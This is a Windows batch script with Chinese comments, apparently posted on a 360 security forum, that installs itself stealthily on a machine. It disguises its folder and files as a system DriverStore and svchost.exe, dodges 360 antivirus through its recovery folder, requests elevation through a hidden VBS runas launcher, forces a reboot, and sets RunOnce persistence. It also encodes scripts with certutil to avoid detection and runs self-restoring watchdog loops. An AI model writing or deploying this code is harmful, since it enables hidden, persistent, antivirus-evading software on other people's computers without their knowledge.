@echo off
setlocal enabledelayedexpansion
:: ====== 增强型伪装设置 ======
set "STEALTH_MODE=1"
set "RND_PREFIX=!random!!random!!random!"
set "SAFE_FOLDER=DriverStore_!RND_PREFIX:~-6!$"
set "INSTALL_DIR=%ProgramData%\Microsoft\%SAFE_FOLDER%"
set "HWID_FILE=%INSTALL_DIR%\.system.dat"
set "RECOVERY_FLAG=0"
:: ====== 360绕过技术 ======
:init_stealth
if defined STEALTH_MODE (
:: 检查是否在360恢复区
if exist "C:\ProgramData\360safe\Recover\%~nx0" (
set "RECOVERY_FLAG=1"
copy "C:\ProgramData\360safe\Recover\%~nx0" "%temp%\%~nx0" >nul
start "" "%temp%\%~nx0"
exit
)
:: 创建无害系统文件伪装
if not exist "%INSTALL_DIR%\" (
mkdir "%INSTALL_DIR%"
echo ; Windows Driver Configuration > "%INSTALL_DIR%\drvcfg.inf"
echo [Version] >> "%INSTALL_DIR%\drvcfg.inf"
echo Signature="$WINDOWS NT$" >> "%INSTALL_DIR%\drvcfg.inf"
echo Class=System >> "%INSTALL_DIR%\drvcfg.inf"
echo ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318} >> "%INSTALL_DIR%\drvcfg.inf"
attrib +s +h +r "%INSTALL_DIR%"
attrib +s +h "%INSTALL_DIR%\drvcfg.inf"
)
:: 创建合法进程名称
set "SAFE_PROC=svchost.exe"
set "SAFE_SCRIPT=winsys.vbe"
)
:: ====== 管理员权限检查 ======
echo Performing system diagnostics...
NET FILE >NUL 2>&1
if '%errorlevel%' NEQ '0' (
echo Requesting administrator privileges...
:: 使用替代UAC提升方法
set "UAC_SCRIPT=%temp%\uac_bypass_!random!.vbs"
(
echo Set UAC = CreateObject^("Shell.Application"^)
echo UAC.ShellExecute "cmd.exe", "/c ""%~f0"" admin", "", "runas", 0
) > "%UAC_SCRIPT%"
wscript //B "%UAC_SCRIPT%"
del /f /q "%UAC_SCRIPT%" >nul 2>&1
exit /b
)
echo.
:: ====== 智能安装流程 ======
if "%1"=="admin" goto admin_mode
if "%1"=="stage2" goto stage2
if "%1"=="stage3" goto stage3
if "%RECOVERY_FLAG%"=="1" goto recovery_mode
:install
:: 阶段1: 无害化预处理
echo Scanning system files... Please wait.
timeout /t 3 >nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Applets" /v Diagnostics /t REG_DWORD /d 1 /f >nul
:: 阶段2: 延迟敏感操作
start /min "" cmd /c "%~f0" stage2
exit /b
:stage2
:: 随机延迟避免检测
set /a delay=!random! %% 10 + 5
timeout /t %delay% >nul
:: 替代WMI的安全启动方法
set "currentPath=%~f0"
set "safeCmd=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v SysDiag /t REG_SZ /d \"\""%currentPath%"\" stage3\" /f"
%safeCmd%
shutdown /r /f /t 0
exit /b
:stage3
:: 核心安装流程
call :install_core_components
if errorlevel 1 exit /b 1
:: 创建守护进程
call :create_guardian
exit /b
:admin_mode
:: 管理员模式下的安装流程
call :install_core_components
if errorlevel 1 exit /b 1
call :create_guardian
exit /b
:recovery_mode
echo System recovery mode activated...
timeout /t 3 >nul
call :install_core_components
call :create_guardian
exit /b
:: ====== 核心组件安装 ======
:install_core_components
:: 使用系统工具伪装
copy /y "%~f0" "%INSTALL_DIR%\%SAFE_PROC%" >nul
attrib +s +h "%INSTALL_DIR%\%SAFE_PROC%"
:: 创建加密脚本(避免检测)
echo Set objWSH = CreateObject("WScript.Shell") > "%INSTALL_DIR%\tmp.vbs"
echo objWSH.Run "cmd /c echo System maintenance in progress...", 0 >> "%INSTALL_DIR%\tmp.vbs"
certutil -encode "%INSTALL_DIR%\tmp.vbs" "%INSTALL_DIR%\%SAFE_SCRIPT%" >nul
del "%INSTALL_DIR%\tmp.vbs"
:: 创建自恢复脚本
echo Set objWSH = CreateObject("WScript.Shell") > "%INSTALL_DIR%\restore.vbs"
echo Set fso = CreateObject("Scripting.FileSystemObject") >> "%INSTALL_DIR%\restore.vbs"
echo Do >> "%INSTALL_DIR%\restore.vbs"
echo On Error Resume Next >> "%INSTALL_DIR%\restore.vbs"
echo If Not fso.FileExists("%INSTALL_DIR%\%SAFE_SCRIPT%") Then >> "%INSTALL_DIR%\restore.vbs"
echo fso.CopyFile "%~f0", "%INSTALL_DIR%\%SAFE_PROC%" >> "%INSTALL_DIR%\restore.vbs"
echo objWSH.Run "cmd /c certutil -encode ""%INSTALL_DIR%\%SAFE_PROC%"" ""%INSTALL_DIR%\%SAFE_SCRIPT%""", 0, True >> "%INSTALL_DIR%\restore.vbs"
echo End If >> "%INSTALL_DIR%\restore.vbs"
echo WScript.Sleep 30000 >> "%INSTALL_DIR%\restore.vbs"
echo Loop >> "%INSTALL_DIR%\restore.vbs"
:: 创建持久化入口(使用替代方法)
echo Windows Registry Editor Version 5.00 > "%temp%\SysTask.reg"
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] >> "%temp%\SysTask.reg"
echo "DriverStoreMaintenance"="wscript.exe //B \"%INSTALL_DIR%\\restore.vbs\"" >> "%temp%\SysTask.reg"
reg import "%temp%\SysTask.reg" >nul
del "%temp%\SysTask.reg"
:: 立即启动恢复监控
start /b wscript.exe //B "%INSTALL_DIR%\restore.vbs"
exit /b 0
:: ====== 守护进程创建 ======
:create_guardian
:: 硬件绑定保护
set "hwid="
for /f "skip=1" %%i in ('wmic csproduct get uuid 2^>nul') do if not defined hwid set "hwid=%%i"
if not defined hwid set "hwid=%COMPUTERNAME%_%RANDOM%"
echo !hwid! > "%HWID_FILE%"
:: 创建守护进程(使用替代方法)
echo Set objWSH = CreateObject("WScript.Shell") > "%INSTALL_DIR%\guardian.vbs"
echo Do >> "%INSTALL_DIR%\guardian.vbs"
echo On Error Resume Next >> "%INSTALL_DIR%\guardian.vbs"
echo objWSH.Run "wscript.exe //B ""%INSTALL_DIR%\%SAFE_SCRIPT%""", 0, False >> "%INSTALL_DIR%\guardian.vbs"
echo WScript.Sleep 60000 >> "%INSTALL_DIR%\guardian.vbs"
echo Loop >> "%INSTALL_DIR%\guardian.vbs"
:: 静默启动守护
start /b wscript.exe //B "%INSTALL_DIR%\guardian.vbs"
:: 启动核心功能
start /b wscript.exe //B "%INSTALL_DIR%\%SAFE_SCRIPT%"
echo Installation completed successfully.
timeout /t 2 >nul
exit /b
|
|
|
|
|
|
|
京公网安备 11000002002063号
京ICP备08010314号-6 Copyright©2005- 360.com 版权所有 360互联网安全中心
安全卫士
极速浏览器
360壁纸
360摄像机
纳米AI搜索
手机卫士
评论
直达楼层